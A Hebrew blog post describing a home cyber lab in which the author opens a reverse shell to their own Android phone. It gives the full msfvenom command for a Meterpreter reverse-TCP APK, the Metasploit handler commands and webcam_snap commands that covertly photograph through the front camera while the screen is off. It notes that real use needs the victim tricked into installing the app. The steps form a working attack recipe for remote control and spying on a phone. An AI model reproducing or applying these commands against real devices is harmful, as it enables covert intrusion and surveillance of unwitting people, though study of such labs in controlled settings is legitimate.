חיפוש
  • יניב אור

מעבדת סייבר - 4

עודכן ב: מאי 11

המטרה

פתיחת reverse shell למכשיר אנדרואיד.


התוקף

לפטופ Asus ROG Strix - מריץ אובונטו 18.04.


הקורבן

סמארטפון OnePlus X שברשותי - מריץ Android 6.0.1.


הכלים

התוכנה metasploit בעזרת msfvenom ו-meterpreter. ראו גם: Metasploit.


הערות

- המכשירים שייכים לי, כמובן, והניסוי נערך ברשת הביתית שלי.

- במהלך המעבדה אני מייצר אפליקציית אנדרואיד בעזרת הכלים שציינתי קודם לכן. את קובץ ה-apk אני מעביר למכשיר הקורבן ומתקין את האפליקציה. מצב אמיתי, יש צורך לגרום לקורבן להוריד את הקובץ ולהתקין אותוו בדרכים אחרות, כמובן.


שלב 1

הרצתי קונטיינר של metasploit בצורה הבאה:

$ docker run --rm -it -v $PWD:/tmp -p 4444:4444 strm/metasploit


הפורט (4444) שפתחתי ומיפיתי ישמש אותי בהמשך לתקשורת בין מכשיר הקורבן לבין התוכנה.


שלב 2

יצרתי payload של קובץ apk בעזרת msfvenom:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4444 R > /tmp/msfvenom.apk



שלב 3

העתקתי את קובץ ה-apk למכשיר הקורבן. לחצתי על קובץ ה-apk שירד ושיניתי את ההגדרות באנדרואיד להתקנת אפליקציות ממקורות לא מוכרים. עברתי מספר מסכים שהזהירו אותי מפני האפליקציה ולבסוף היא הותקנה. לאחר מכן הרצתי אותה.



שלב 4

בחזרה ל-metasploit. אין צורך להיות באותו סשן שבו יצרנו את ה-apk, כמובן. הרצתי את הפקודות הבאות:

> use exploit/multi/handler

> set payload android/meterpreter/reverse_tcp

> set lhost 192.168.1.8

> set lport 4444

> exploit

נפתח handler ל-reverse TCP ומה שנשאר לעשות זה לחכות לקורבן שיריץ את האפליקציה.


שלב 5

ברגע שהקורבן מריץ את האפליקציה, נפתח חיבור למחשב התוקף ונפתח session ב-metasploit.

הקלדתי help ובדקתי אילו אפשרויות נפתחו בפניי לביצוע במכשיר הקורבן.


שלב 6

בחרתי בפעולה של שימוש במצלמה לצילום תמונה בודדת.


הצגתי רשימה של המצלמות במכשיר הזמינות לשימוש:

> webcam_list

הצגתי את ה-help של webcam_snap שמשמש לצילום תמונה בודדת:

> webcam_snap -h

צילמתי תמונה מהמצלמה הקדמית לקובץ בתיקיית tmp - התיקיה אותה מיפיתי קודם לכן בהרצת הקונטיינר:

> webcam_snap -i 2 -p /tmp/test123.jpeg

חשוב לציין, מסך הטלפון היה כבוי, לא נעשה שימוש בפלאש של המצלמה ולמעשה לא היה שום סימן שנעשה שימוש במצלמה. למרות זאת, הצילום בוצע בהצלחה. איכות לא משהו. יש אפשרות לשפר את העניין.


מעבדות נוספות

מעבדות סייבר

© 2023 by DO IT YOURSELF. Proudly created with Wix.com